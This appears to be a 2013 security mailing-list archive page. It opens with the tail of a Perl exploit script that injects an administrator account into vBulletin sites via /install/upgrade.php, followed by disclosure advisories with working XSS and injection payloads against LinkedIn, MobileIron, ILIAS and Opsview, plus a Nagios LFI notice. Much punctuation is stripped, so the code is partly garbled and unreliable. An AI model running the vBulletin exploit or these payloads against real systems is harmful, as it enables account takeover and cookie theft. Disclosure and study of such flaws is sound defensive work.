print --- Usage: perl $0 target\n\n;
exit; }

my $site = $ARGV[0];

# Change these as needed #
my $user = MorXploit;
my $passwd = m0rxpl017;
my $email = dev%40null.com;
my $path = /install/upgrade.php;
##

my $accept = Accept: */*;
my $ct = application/x-www-form-urlencoded;
my $port = 80;

system ('clear');
print \n;
print ===\n;
print --- vbulletin admin injection exploit\n;
print --- By: Simo Ben youssef simo_at_morxploit_com\n;
print --- MorXploit Research www.MorXploit.com\n;
print ===\n;

my $sock = new IO::Socket::INET ( PeerAddr = $site,PeerPort = $port,Proto 
= tcp); die \n[-] Can't creat socket: $!\n unless $sock;

print [*] Trying to get customer number ... hold on!\n;

print $sock GET $path HTTP/1.1\n; 
print $sock Host: $site\n;
print $sock $accept\n;
print $sock Content-Type: $ct\n;
print $sock Connection: Close\n\n;

my $gotcn;
while(my $cn = $sock) {
if ($cn =~ /CUSTNUMBER = \(.*?)\/){
$gotcn = $1;
}
}

if (!defined $gotcn) {
print [-] Failed to get customer number! Nulled? Going to try anyway!\n;
}
else {
print [+] Got $gotcn!\n;
}
my $xploit = 
ajax=1version=installchecktable=falsefirstrun=falsestep=7startat=0only=falsecustomerid=$gotcnoptions[skiptemplatemerge]=0response=yeshtmlsubmit=1htmldata[username]=$userhtmldata[password]=$passwdhtmldata[confirmpassword]=$passwdhtmldata[email]=$email;
my $cl = length($xploit);
my $content = Content-Length: $cl;

my $sock2 = new IO::Socket::INET ( PeerAddr = $site,PeerPort = 
$port,Proto = tcp); die \n[-] Can't creat socket: $!\n unless $sock;

print [*] Trying to MorXploit $site ... hold on!\n;

print $sock2 POST $path HTTP/1.1\n;
print $sock2 Host: $site\n;
print $sock2 $accept\n;
print $sock2 Cookie: bbcustomerid=$gotcn\n;
print $sock2 Content-Length: $cl\n;
print $sock2 Content-Type: $ct\n;
print $sock2 Connection: Close\n\n;
print $sock2 $xploit\n\n;

while(my $result = $sock2){
if ($result =~ /Administrator account created/) {
print [+] Admin account successfully injected!\n;
print [+] Admin: $user\n;
print [+] Pass: $passwd\n;
exit;
}
}
print [-] Failed, something went wrong\n;
exit;

[ISecAuditors Security Advisories] XSS vulnerability in LinkedIn

2013-10-28 Thread ISecAuditors Security Advisories 
=
INTERNET SECURITY AUDITORS ALERT 2013-003
- Original release date: March 3rd, 2013
- Last revised: March 10th, 2013
- Discovered by: Vicente Aguilera Diaz
- Severity: 4.3/10 (CVSSv2 Base Score)
=

I. VULNERABILITY
-
XSS vulnerability in LinkedIn.

II. BACKGROUND
-
LinkedIn is a social networking service and website (www.linkedin.com)
for professionals. The site officially launched on May 5, 2003. As of
September 30,

2012 (the end of the third quarter), professionals are signing up to
join LinkedIn at a rate of approximately two new members per second.
Actually, Over 200

million professionals use LinkedIn to exchange information, ideas and
opportunities.

More info: http://www.linkedin.com

III. DESCRIPTION
-
Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web
sites.

Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser
side script, to a

different end user. Flaws that allow these attacks to succeed are quite
widespread and occur anywhere a web application uses input from a user
in the output

it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting
user. The end user’s browser has no way to know that the script should
not be trusted,

and will execute the script. Because it thinks the script came from a
trusted source, the malicious script can access any cookies, session
tokens, or other

sensitive information retained by your browser and used with that site.
These scripts can even rewrite the content of the HTML page.

LinkedIn is vulnerable to XSS attacks during a DWR (Direct Web Remoting,
a Java open source library) call through the c0-id parameter. There
are several

instances of this issue:
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreativeText.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getBidSuggestion.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateClickThroughUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getCostAndMemberCount.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateRequiredFields.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateDisplayUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getExampleAds.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.changeBizAcctName.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.updateAlertMessageId.dwr

IV. PROOF OF CONCEPT
-
Next, we show a typical request to the
/ads/dwr/exec/SasAjax.validateCreative.dwr resource:

POST /ads/dwr/exec/SasAjax.validateCreative.dwr HTTP/1.1
Host: www.linkedin.com
...other-HTTP-headers...

callCount=1
JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9
c0-scriptName=SasAjax
c0-methodName=validateCreative
c0-id=5518_1360723319833
c0-param0=string:
c0-param1=string:
c0-param2=string:
c0-param3=string:
c0-param4=string:
c0-param5=string:
c0-param6=string:en_US
c0-param7=string:0
c0-param8=string:0
c0-param9=number:0
xml=true

Some parameters are not used/validated by the application, so we can
remove these parameters from the request. The only parameters that are
required by the

application are:
- callCount
- JSESSIONID == can have anything value, but must match the JSESSIONID
cookie
- c0-id == vulnerable parameter (we can inject HTML/script code through
this parameter)
- xml == we need to change the value from true (default value) to
false to make possible the script code injection

Also, we can use HTTP GET method instead the HTTP POST method used at
this request. This makes it more easy the exploitation of the XSS
vulnerability.

For example, we can inject script code to show an alert popup with the
document.cookie value:
c0-id=5518_1360723319833');/SCRIPTSCRIPTalert(document.cookie);/SCRIPT!--

So, finally, this HTTP request provoke the XSS exploitation::

https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr?callCount=1JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9c0-

id=5578_1362323397833');/SCRIPTSCRIPTalert(document.cookie);/SCRIPT!--xml=false

V. BUSINESS IMPACT
-
A malicious user can access to the information stored in the cookie on
other users, so the attacker can spoof they identity and access to these
user

accounts.

VI. SYSTEMS AFFECTED
-
http://www.linkedin.com

VII. SOLUTION
-
Pending.

VIII. REFERENCES
-
http://www.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

IX. CREDITS
-
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz, vaguilera (at) isecauditors (dot)

[scip_Advisory 10847] MobileIron 4.5.4 Device Registration regpin Cross Site Scripting

2013-10-28 Thread Marc Ruef 
MobileIron 4.5.4 Device Registration regpin Cross Site Scripting

scip AG Vulnerability ID 10847 (10/28/2013)
http://www.scip.ch/en/?vuldb.10847

I. INTRODUCTION

MobileIron is a commercial solution to provide secure access to mobile users in 
corporate environments.

More information is available on the official web site at the following URL:

http://www.mobileiron.com/

II. DESCRIPTION

Pascal Schaufelberger at scip AG found a cross site scripting vulnerability in 
the older release 4.5.4.

An attacker is able to inject arbitrary script code without former 
authentication.

III. SCORING

CVSSv2 Base Score: 7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSSv2 Temp Score: 5.9 (CVSS2#E:POC/RL:OF/RC:C)

IV. EXPLOITATION

The attack requires access to the device registration form. The attack attempt 
can be initiated with the following url:

https://www.example.com/mifs/c/i/reg/reg.html?regpin=12345;scriptalert('scip')/script

V. IMPACT

This is a traditional reflected cross site scripting vulnerability, which 
allows the injection of arbitrary script code. An attacker might be able to 
alter the behavior of the web site and might therefore attack visitors.

VI. DETECTION

Cross site scripting pattern in the regpin field should be detected and 
eliminated. Most security solutions provide this function out of the box.

VII. SOLUTION

This issue got fixed in release 5.1.0 without further notification. Current 
release is 5.8, which has been available since October 2013.

VIII. VENDOR RESPONSE

The issue has been reported to the vendor via email. The communication was very 
efficient and friendly.

After exchange of technical details the vendor informed that this issue was 
known already and has been patched without further notice.

IX. SOURCES

scip AG - Security is our Business
http://www.scip.ch

scip AG - Vulnerability Database
http://www.scip.ch/en/?vuldb.10847

X. DISCLOSURE TIMELINE

2013/09/28 Identification of the vulnerability
2013/10/14 First contact to MobileIron via Twitter
2013/10/15 Got mail address of MobileIron security contact
2013/10/16 Initial confirmation of our submission by MobileIron
2013/10/18 Detailed description of further actions by MobileIron
2013/10/18 Confirmation of next steps by scip AG
2013/10/28 Public disclosure of the advisory

XI. CREDITS

The vulnerability has been discovered by Pascal Schaufelberger.

Pascal Schaufelberger, scip AG, Zuerich, Switzerland
pasc-at-scip.ch
http://www.scip.ch

The disclosure process has been handled by Marc Ruef.

Marc Ruef, scip AG, Zuerich, Switzerland
maru-at-scip.ch
http://www.scip.ch

A1. LEGAL NOTICES

Copyright (c) 2002-2013 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.

[PT-2013-46] Local File Include in Nagios Looking Glass

2013-10-28 Thread noreply 
---
  (PT-2013-46) Positive Technologies Security Advisory 
  Local File Include in Nagios Looking Glass
---

---[ Vulnerable software ]

Nagios Looking Glass 
Version: 1.1.0 beta 2 and earlier

Link: 
http://exchange.nagios.org/directory/Addons/Frontends-(GUIs-and-CLIs)/Web-Interfaces/Nagios-Looking-Glass/details

---[ Severity level ]

Severity level: High 
Impact: Files Reading 
Access Vector:  Remote 
CVSS v2: 
Base Score: 7.8 
Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)

CVE: not assigned

---[ Software description ]

Nagios Looking Glass (NLG) is a web-based interface for Nagios that allows you 
to show at-a-glance, real-time server status to 3rd parties without giving them 
direct access to Nagios.

---[ Vulnerability description ]

The specialists of the Positive Research center have detected a Local File 
Include vulnerability in Nagios Looking Glass.

Application don't validates input data. That allows attackers to read config 
file. To exploit this vulnerability remote attacker shouldn't have privileges 
in Nagios Looking Glass. 
Vulnerability exists in server/s3_download.php.

---[ How to fix ]

No solution

---[ Advisory status ]

19.07.2013 - Vendor gets vulnerability details 
13.08.2013 - Vulnerability details were sent to CERT 
28.10.2013 - Public disclosure

---[ Credits ]

The vulnerability was detected by Vyacheslav Egoshin, Positive Research Center 
(Positive Technologies Company)

---[ References ]

http://en.securitylab.ru/lab/PT-2013-46 
Reports on the vulnerabilities previously discovered by Positive Research:

http://www.ptsecurity.com/research/advisory/ 
http://en.securitylab.ru/lab/

Re: Call for Papers, 2014 Symposium on Protocols and Rules for Security (SPRS2014)

2013-10-28 Thread Brandon Butterworth 
  td style=PADDING-BOTTOM: 5px; LINE-HEIGHT: 22px;
  PADDING-LEFT: 5px; PADDING-RIGHT: 5px; FONT-FAMILY: Times New
  Roman; COLOR: #2b2b2b; FONT-SIZE: 19px; PADDING-TOP: 5px
  align=leftp style=line-height:23px;font-size:20px;Dear
  Colleagues,/p pWe would like to cordially invite you to
  submit or recommend papers to 2014 Symposium on Protocols and
  Rules for Security (SPRS2014)!

May I suggest

rule 1. Don't send html only email

to enable

rule 2. Don't render html email unless you're sure it's what it claims
to be and you are sure it is safe. Actually just don't, you know
someone in your organisation will get phished, putting others at risk.
Just strip the html at your MTA, you can do this because of rule 1.

regards
brandon

ILIAS eLearning 4.3.4 4.4 CMS - Persistent Notes Web Vulnerability

2013-10-28 Thread Vulnerability Lab 
Document Title:
===
ILIAS eLearning 4.3.4  4.4 CMS - Persistent Notes Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1122


Release Date:
=
2013-10-27


Vulnerability Laboratory ID (VL-ID):

1122


Common Vulnerability Scoring System:

3.9


Product  Service Introduction:
===
ILIAS is a web base learning management system (LMS, VLE). Features: Courses, 
SCORM 1.2 and 2004, mail, forum, chat, groups, 
podcast, file sharing, authoring, CMS, test, wiki, personal desktop, LOM, LDAP, 
role based access.

(Copy of the Homepage: http://sourceforge.net/projects/ilias/ )



Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the ILIAS eLearning v4.3.4  v4.4 CMS web-application.


Vulnerability Disclosure Timeline:
==
2013-10-27:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

ILIAS
Product: ILIAS eLearning - Content Management System 4.3.4  4.4 


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details  Description:

A persistent input validation web vulnerability is detected in the ILIAS 
eLearning v4.3.4  v4.4 CMS web-application.
The bug allows an attacker (remote) to implement/inject malicious own malicious 
persistent script codes (application side).

The persistent web vulnerability is located in the `Notes  Comments` module. 
Remote attackers are able to inject own 
malicious script code via POST method request in the vulnerable comment or note 
parameters. The execute occurs in the 
in the comments and private notes modules of the admin panel.

Exploitation of the persistent web vulnerability requires low user interaction 
and a low privileged web-application user account.
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account steal via persistent 
web attacks, persistent phishing or persistent module context manipulation.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Notes
[+] Comments

Vulnerable Parameter(s):
[+] note

Affected Module(s):
[+] Private Notes
[+] Comments Review


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low user interaction and low privileged 
web-application user account. For demonstration or to reproduce ...

PoC: Public Comments  private Notes

div class=ilNote
a name=note_35!-- img src=./templates/default/images/note_unlabeled.png 
alt=Note 
title=Note border=0 style=vertical-align:text-bottom; 
margin-bottom:2px;/ --/a
span class=small light   Last edited on 26. Oct 2013/span
div class=ilNoteTexth4 class=ilNoteTitle/h4%20%20[PERSISTENT 
INJECTED SCRIPT CODE!]
/div/div


--- PoC Session Logs ---
Status: 302[Found]
POST http://ilias.localhost:8080/ilias.php?
note_type=1cmd=postcmdClass=ilnoteguicmdNode=eu:jl:jkbaseClass=ilPersonalDesktopGUIfallbackCmd=getNotesHTMLrtoken=2d302c4c574f61fc880f393433703e1b
 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[20] 
Mime Type[text/html]
   
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 
Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1¬e_id=35cmd=editNoteFormcmdClass=ilnoteguicmdNode=eu:jl:jkbaseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; 
authchallenge=459071aa3327de70506cb2a465507bf5]
Connection[keep-alive]
   

Post Data:
note[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvulnerability-lab.com%2F%3E%40gmail.com%0D%0A%3E
%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cdiv+style%3D%221%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E%40gmail.com]
cmd%5BupdateNote%5D[Update+Note]
note_id[35]
   

Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[http://ilias.localhost:8080/ilias.php?note_mess=modcmd=showNotescmdClass=ilnoteguicmdNode=eu:jl:jkbaseClass=ilPersonalDesktopGUI#notes_top]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]

CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View

2013-10-28 Thread J. Oquendo 
CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
Version(s): Opsview pre 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)


I. ADVISORY

Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View
Date published: 2013-10-28
Vendor contacted: 2013-09-04


II. BACKGROUND

Opsview is a systems management software built on open
source software. To minimize noise, read more about it
here

http://www.opsview.com/about-us


II. DESCRIPTION

Opsview is vulnerable to a few different XSS based attacks.

/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/

There are a variety of iterations within those functions
which may allow a malicious user to trigger a cross site
scripting attack.


III. EXAMPLE

GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT 
HERE%3e HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]



GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]



POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

app=OPSVIEWback=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22login=Sign+inlogin_password=nologin_username=no



POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22host_selection=opsviewservice_selection=opsview%3bConnectivity%20-%20LANsubmit=Submit



GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

III SOLUTION

Opsview released a fix with Opsview 4.4.1 
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

Where ignorance is our master, there is no possibility of
real peace - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF